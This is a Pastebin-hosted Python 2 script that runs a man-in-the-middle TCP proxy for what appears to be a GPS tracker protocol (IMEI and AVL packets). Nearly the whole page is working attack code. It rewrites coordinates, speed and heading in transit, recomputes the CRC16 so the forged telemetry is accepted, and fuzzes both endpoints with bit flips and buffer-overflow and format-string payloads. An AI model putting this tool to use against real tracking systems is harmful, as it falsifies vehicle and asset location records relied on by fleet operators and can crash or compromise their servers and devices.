Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import datetime
- from twisted.protocols import portforward
- from twisted.internet.protocol import DatagramProtocol
- from twisted.internet import reactor
- import getopt, sys
- import binascii
- from random import randint
- lst_full=[]
- lst_data=[]
- verbose = False
- notuntil = 0
- request = 0
- count = 1
- proto = "tcp"
- localport = 0
- desthost = ""
- destport = 0
- testclient = 0
- testserver = 0
- smth_x=0
- smth_y=0
- x_=20
- change=0
- pent_c=0
- g_count=0
- rnd_angle=0
- rnd_coord=0
- pent = [[600056480,303452580],[598401910,304894530],[599464550,301303380],[599478320,305629240],[598401910,301990020]]
- overflowstrings = ["A" * 255, "A" * 256, "A" * 257, "A" * 420, "A" * 511, "A" * 512, "A" * 1023, "A" * 1024, "A" * 2047, "A" * 2048, "A" * 4096, "A" * 4097, "A" * 5000, "A" * 10000, "A" * 20000, "A" * 32762, "A" * 32763, "A" * 32764, "A" * 32765, "A" * 32766, "A" * 32767, "A" * 32768, "A" * 65534, "A" * 65535, "A" * 65536, "%x" * 1024, "%n" * 1025 , "%s" * 2048, "%s%n%x%d" * 5000, "%s" * 30000, "%s" * 40000, "%.1024d", "%.2048d", "%.4096d", "%.8200d", "%99999999999s", "%99999999999d", "%99999999999x", "%99999999999n", "%99999999999s" * 1000, "%99999999999d" * 1000, "%99999999999x" * 1000, "%99999999999n" * 1000, "%08x" * 100, "%%20s" * 1000,"%%20x" * 1000,"%%20n" * 1000,"%%20d" * 1000, "%#0123456x%08x%x%s%p%n%d%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%#0123456x%%x%%s%%p%%n%%d%%o%%u%%c%%h%%l%%q%%j%%z%%Z%%t%%i%%e%%g%%f%%a%%C%%S%%08x"]
- def crc16(buff, crc = 0, poly = 0xA001):
- l = len(buff)
- i = 0
- while i < l:
- ch = ord(buff[i])
- uc = 0
- while uc < 8:
- if (crc & 1) ^ (ch & 1):
- crc = (crc >> 1) ^ poly
- else:
- crc >>= 1
- ch >>= 1
- uc += 1
- i += 1
- return crc
- def zero_fill(str, count):
- tmp=len(str)
- i=0
- while i<count-tmp:
- str="0"+str
- i=i+1
- return str
- def bitflipping(data):
- l = len(data)
- n = int(l*7/100)
- for i in range(0,n):
- r = randint(0,l-1)
- data = data[0:r] + chr(randint(0,255)) + data[r+1:]
- return data
- def bofinjection(data):
- l = len(data)
- r = randint(0,len(overflowstrings)-1)
- data = data[0:r] + overflowstrings[r] + data[r-l:]
- return data
- def fuzz(data):
- print "Fuzz ON"
- r = randint(0,0)
- if r==0:
- data = bitflipping(data)
- r = randint(0,0)
- if r==1:
- data = bofinjection(data)
- return data
- def add_hex2(hex1, hex2):
- return hex(int(hex1, 16) + int(hex2, 16))
- def lst_print_data(lst): ##print only data
- all=[]
- str=""
- all.append(lst[2])
- all.append(lst[3])
- for x in lst[4]:
- all.append(x[0])
- all.append(x[1])
- all.append(x[2])
- all.append(x[3])
- all.append(x[4])
- all.append(x[5])
- all.append(x[6])
- all.append(x[7])
- for y in x[8]:
- all.extend(y)
- all.append(lst[5])
- for z in all:
- str=str+z
- return str
- def lst_print(lst): ##print all packet
- all=[]
- str=""
- all.append(lst[0])
- all.append(lst[1])
- all.append(lst[2])
- all.append(lst[3])
- for x in lst[4]:
- all.append(x[0])
- all.append(x[1])
- all.append(x[2])
- all.append(x[3])
- all.append(x[4])
- all.append(x[5])
- all.append(x[6])
- all.append(x[7])
- for y in x[8]:
- all.extend(y)
- all.append(lst[5])
- all.append(lst[6])
- for z in all:
- str=str+z
- return str
- def parce_imei(case2):
- global count
- count=0
- lst_imei=[]
- lst_imei.append(case2[:4]) ##[0] - imei size
- lst_imei.append(case2[4:]) ##[1]- imei
- print "===Hello IMEI: "+ lst_imei[1].decode("hex")+"==="
- def parce_data(case):
- global x_
- global change
- global pent_c
- change=0
- y_=0
- lst_avl=[]
- lst_io_full=[]
- lst_io_1b=[]
- lst_io_2b=[]
- lst_io_4b=[]
- lst_io_8b=[]
- lst_avl.append(case[x_:x_+16]) ## [2][i][0] - timestamp
- lst_avl.append(case[x_+16:x_+18]) ## [2][i][1] - Priority
- lst_avl.append(case[x_+18:x_+26]) ## [2][i][2]- long
- lst_avl.append(case[x_+26:x_+34]) ## [2][i][3]- lat
- lst_avl.append(case[x_+34:x_+38]) ## [2][i][4]- Alt
- lst_avl.append(case[x_+38:x_+42]) ## [2][i][5]- Angle
- lst_avl.append(case[x_+42:x_+44]) ## [2][i][6]- Satellites
- lst_avl.append(case[x_+44:x_+48]) ## [2][i][7]- Speed
- ##io##
- lst_io_full.append(case[x_+48:x_+50]) ## [2][i][8][0]- Event IO ID
- lst_io_full.append(case[x_+50:x_+52]) ## [2][i][8][1] - N of Total IO
- l1b_x=x_+52
- l1b_y=x_+54
- ################
- lst_io_full.append(case[l1b_x:l1b_y]) ## [2][i][8][2] - N1 of One Byte IO
- io_1b=int('0x'+lst_io_full[2],16)
- l2b_x=l1b_x+2+io_1b*4
- l2b_y=l1b_y+2+io_1b*4
- lst_io_full.append(lst_io_1b) ## [2][i][8][3] - List of 1b IO
- lst_io_full.append(case[l2b_x:l2b_y]) ## [2][i][8][4] - N2 of Two Byte IO
- io_2b=int('0x'+lst_io_full[4],16)
- l4b_x=l2b_x+2+io_2b*6
- l4b_y=l2b_y+2+io_2b*6
- lst_io_full.append(lst_io_2b) ## [2][i][8][5] - List of 2b IO
- lst_io_full.append(case[l4b_x:l4b_y]) ## [2][i][8][6] - N4 of Four Byte IO
- io_4b=int('0x'+lst_io_full[6],16)
- l8b_x=l4b_x+2+io_4b*10
- l8b_y=l4b_y+2+io_4b*10
- lst_io_full.append(lst_io_4b) ## [2][i][8][7] - List of 4b IO
- lst_io_full.append(case[l8b_x:l8b_y]) ## [2][i][8][8] - N8 of Eight Byte IO
- io_8b=int('0x'+lst_io_full[8],16)
- lst_io_full.append(lst_io_8b) ## [2][i][8][9] - List of 8b IO
- ################
- dt = datetime.datetime.fromtimestamp(float(str(int('0x'+lst_avl[0],16))[:10])).strftime('%Y-%m-%d %H:%M:%S')
- print "\tTimeStamp: " + lst_avl[0] + " ("+ dt +")"
- print "\tPriority: " + lst_avl[1]
- print "\tGPS Element:"
- lat = float(int('0x'+lst_avl[2],16))/10000000
- print "\t\tLatitude: " + lst_avl[2] + " (" + str(lat) +" E)"
- lon = float(int('0x'+lst_avl[3],16))/10000000
- print "\t\tLatitude: " + lst_avl[3] + " (" + str(lon) +" N)"
- ##change coord
- if rnd_coord:
- #pentagramm
- lst_avl[2]=hex(pent[pent_c][1]).replace('0x','')
- lst_avl[3]=hex(pent[pent_c][0]).replace('0x','')
- #change lat and long (+64)
- # lst_avl[2]=add_hex2('0x'+lst_avl[2],'0x'+str(64*g_count)).replace('0x','')
- # lst_avl[3]=add_hex2('0x'+lst_avl[3],'0x'+str(64*g_count)).replace('0x','')
- lat = float(int('0x'+lst_avl[2],16))/10000000
- print "\t\t--->New Latitude: " + lst_avl[2] + " (" + str(lat) +" E)"
- lon = float(int('0x'+lst_avl[3],16))/10000000
- print "\t\t--->New Latitude: " + lst_avl[3] + " (" + str(lon) +" N)"
- pent_c=pent_c+1
- if pent_c==len(pent):
- pent_c=0
- change=1
- alt =int('0x'+lst_avl[4],16)
- print "\t\tAltitude: "+ lst_avl[4] + " (" + str(alt) +" meters)"
- ang =int('0x'+lst_avl[5],16)
- print "\t\tAngle: "+ lst_avl[5] + " (" + str(ang) +")"
- ##change angle
- if rnd_angle:
- lst_avl[5]=zero_fill(hex(randint(200,300)).replace('0x',''),4)
- ang =int('0x'+lst_avl[5],16)
- print "\t\t--->New Angle: "+ lst_avl[5] + " (" + str(ang) +")"
- sat=int('0x'+lst_avl[6],16)
- print "\t\tSattelites: "+ lst_avl[6] + " (" + str(sat) +" visible sattelites)"
- spd=int('0x'+lst_avl[7],16)
- print "\t\tSpeed: "+ lst_avl[7] + " (" + str(spd) +" km/h)"
- ###change speed
- if smth_x>0 and smth_y>0:
- lst_avl[7]=zero_fill(hex(randint(smth_x,smth_y)).replace('0x',''),4)
- spd=int('0x'+lst_avl[7],16)
- print "\t\t--->New Speed: "+ lst_avl[7] + " (" + str(spd) +" km/h)"
- change=1
- print "\tIO Element:"
- io_id=int('0x'+lst_io_full[0],16)
- print "\t\tEvent IO ID: " + lst_io_full[0] + " (" + str(io_id) +")"
- io_total=int('0x'+lst_io_full[1],16)
- print "\t\tTotal ID:" + lst_io_full[1] + " (" + str(io_total) +" IO elements)"
- x_=x_+50 ## THINK!!! it's correct if all IO counters exist when Global counter eq 0
- print "\t\tCount of 1 byte IO: " + lst_io_full[2] + " (" + str(io_1b) +")"
- x_=l1b_y
- for i in range(io_1b):
- lst_io_1b.append(case[l1b_x+2+i*4:l1b_y+2+i*4]) ## [2][i][8][3][i*2] - N'st IO ID
- lst_io_1b.append(case[l1b_x+4+i*4:l1b_y+4+i*4]) ## [2][i][8][3][i*2+1] - N'st IO value
- tmp_io1=int('0x'+lst_io_1b[i*2],16)
- tmp_io2=int('0x'+lst_io_1b[i*2+1],16)
- print "\t\t\tIO ID: " + lst_io_1b[i*2] + " (" + str(tmp_io1)+ ")"
- print "\t\t\t"+str(tmp_io1) + "'st IO value: " + lst_io_1b[i*2+1] + " (" + str(tmp_io2)+ ")"
- y_=l1b_y+4+i*4
- k=i+1
- print "\t\tCount of 2 byte IO: " + lst_io_full[4] + " (" + str(io_2b) +")"
- x_=l2b_y
- for i in range(io_2b):
- lst_io_2b.append(case[l2b_x+2+i*6:l2b_y+2+i*6]) ##[2][i][8][5][i*2] - N'st IO ID
- lst_io_2b.append(case[l2b_x+4+i*6:l2b_y+6+i*6]) ##[2][i][8][5][i*2+1] - N'st IO value
- tmp_io1=int('0x'+lst_io_2b[i*2],16)
- tmp_io2=int('0x'+lst_io_2b[i*2+1],16)
- print "\t\t\tIO ID: " + lst_io_2b[i*2] + " (" + str(tmp_io1)+ ")"
- print "\t\t\t"+str(tmp_io1) + "'st IO value: " + lst_io_2b[i*2+1] + " (" + str(tmp_io2)+ ")"
- y_=l2b_y+6+i*6
- print "\t\tCount of 4 byte IO: " + lst_io_full[6] + " (" + str(io_4b) +")"
- x_=l4b_y
- for i in range(io_4b):
- lst_io_4b.append(case[l4b_x+2+i*10:l4b_y+2+i*10]) ##[2][i][8][7][i*2] - N'st IO ID
- lst_io_4b.append(case[l4b_x+4+i*10:l4b_y+10+i*10]) ##[2][i][8][7][i*2+1] - N'st IO value
- tmp_io1=int('0x'+lst_io_4b[i*2],16)
- tmp_io2=int('0x'+lst_io_4b[i*2+1],16)
- print "\t\t\tIO ID: " + lst_io_4b[i*2] + " (" + str(tmp_io1)+ ")"
- print "\t\t\t"+str(tmp_io1) + "'st IO value: " + lst_io_4b[i*2+1] + " (" + str(tmp_io2)+ ")"
- y_=l4b_y+10+i*10
- print "\t\tCount of 8 byte IO: " + lst_io_full[8] + " (" + str(io_8b) +")"
- x_=l8b_y
- for i in range(io_8b):
- lst_io_8b.append(case[l4b_x+2+i*18:l4b_y+2+i*18]) ##[2][i][8][9][i*2] - N'st IO ID
- lst_io_8b.append(case[l4b_x+4+i*18:l4b_y+18+i*18]) ##[2][i][8][9][i*2+1] - N'st IO value
- tmp_io1=int('0x'+lst_io_8b[i*2],16)
- tmp_io2=int('0x'+lst_io_8b[i*2+1],16)
- print "\t\t\tIO ID: " + lst_io_8b[i*2] + " (" + str(tmp_io1)+ ")"
- print "\t\t\t"+str(tmp_io1) + "'st IO value: " + lst_io_8b[i*2+1] + " (" + str(tmp_io2)+ ")"
- y_= l4b_y+18+i*18
- if y_>0 and x_<y_:
- x_=y_
- lst_avl.append(lst_io_full)
- lst_data.append(lst_avl)
- print "count:"+str(g_count)
- def parce(case):
- global lst_full
- global lst_data
- global x_
- global change
- global g_count
- x_=20 #data offset
- lst_full=[]
- lst_data=[]
- print("\n==========start parser============")
- lst_full.append(case[:8]) ## [0] - 4 zero bytes
- lst_full.append(case[8:16]) ## [1] - Size of Data
- lst_full.append(case[16:18]) ## [2] - codecID
- lst_full.append(case[18:20]) ## [3] - Number of Data
- lst_full.append(lst_data) ## [4][0] - Data
- lst_full.append(case[-10:-8]) ## [5] - Number of Data2
- lst_full.append(case[-8:]) ## [6] - CRC16
- Dat_S = int('0x'+lst_full[1],16)
- print "Data size: " + lst_full[1]+ " ("+str(Dat_S)+" bytes)"
- print "codecID: " + lst_full[2]
- NoD = int('0x'+lst_full[3],16)
- print "Number of Data: " + lst_full[3] + " ("+str(NoD)+")"
- for i in range(NoD):
- print "Data #" + str(i+1)+":"
- parce_data(case)
- NoD2= int('0x'+lst_full[5],16)
- print "Number of Data2: " + lst_full[5] + " ("+str(NoD2)+")"
- print "CRC16: " + lst_full[6]
- if change==1:
- olo = lst_print_data(lst_full)
- lst_full[6]=zero_fill(hex(crc16(olo.decode("hex"))).replace('0x',''),8)
- print "--->New CRC: "+ lst_full[6]
- change=0
- g_count=g_count+15
- return lst_print(lst_full)
- def server_dataReceived(self, data):
- global verbose
- global notuntil
- global request
- global count
- global testserver
- if testserver:
- if request < notuntil:
- request = request + 1
- else:
- data = fuzz(data)
- if verbose:
- print "Client ------> server"
- print binascii.b2a_hex(data)
- if (count and len(data)<35):
- parce_imei(binascii.b2a_hex(data))
- else:
- print "Start"
- count=1
- data=binascii.a2b_hex(parce(binascii.b2a_hex(data)))
- portforward.Proxy.dataReceived(self, data)
- portforward.ProxyServer.dataReceived = server_dataReceived
- def client_dataReceived(self, data):
- global verbose
- global notuntil
- global request
- global testclient
- if testclient:
- if request < notuntil:
- request = request + 1
- else:
- data = fuzz(data)
- if verbose:
- print "Server ------> Client"
- print "%r" % data
- portforward.Proxy.dataReceived(self, data)
- portforward.ProxyClient.dataReceived = client_dataReceived
- def starttcpproxy():
- reactor.listenTCP(localport, portforward.ProxyFactory(desthost, destport))
- reactor.run()
- def usage():
- #print "###############################################################"
- print "python decode_telt.py -l <localport> -r <remotehost> -p <remoteport> [options]"
- print
- print " [options]"
- print " -c: Fuzz only client side (both otherwise)"
- print " -s: Fuzz only server side (both otherwise)"
- print " -w: Number of requests to send before start fuzzing"
- print " -v: Verbose (outputs network traffic)"
- print " -x: Random Speed. From x"
- print " -y: Random Speed. To y"
- print " -a: Random angle"
- print " -k: Pentagram"
- print " -h: Help page"
- def main():
- global notuntil
- global proto
- global localport
- global desthost
- global destport
- global testclient
- global testserver
- global verbose
- global smth_x
- global smth_y
- global rnd_angle
- global rnd_coord
- try:
- opts, args = getopt.getopt(sys.argv[1:], "vakhcsl:r:p:w:x:y:", ["help"])
- except getopt.GetoptError:
- usage()
- sys.exit(2)
- try:
- for o, a in opts:
- if o in ("-h", "--help"):
- usage()
- sys.exit()
- if o == "-l":
- localport=int(a)
- if o == "-r":
- desthost=a
- if o == "-p":
- destport=int(a)
- if o == "-v":
- verbose = True
- if o == "-a":
- rnd_angle = 1
- if o == "-k":
- rnd_coord = 1
- if o == "-w":
- notuntil=int(a)
- if o == "-c": # Only client
- testclient=1
- if o == "-s": # Only server
- testserver=0
- if o == "-x":
- smth_x=int(a)
- if o == "-y":
- smth_y=int(a)
- except:
- usage()
- sys.exit(2)
- if localport==0 or desthost=="" or destport==0:
- usage()
- sys.exit(2)
- else:
- if proto=="tcp":
- starttcpproxy()
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement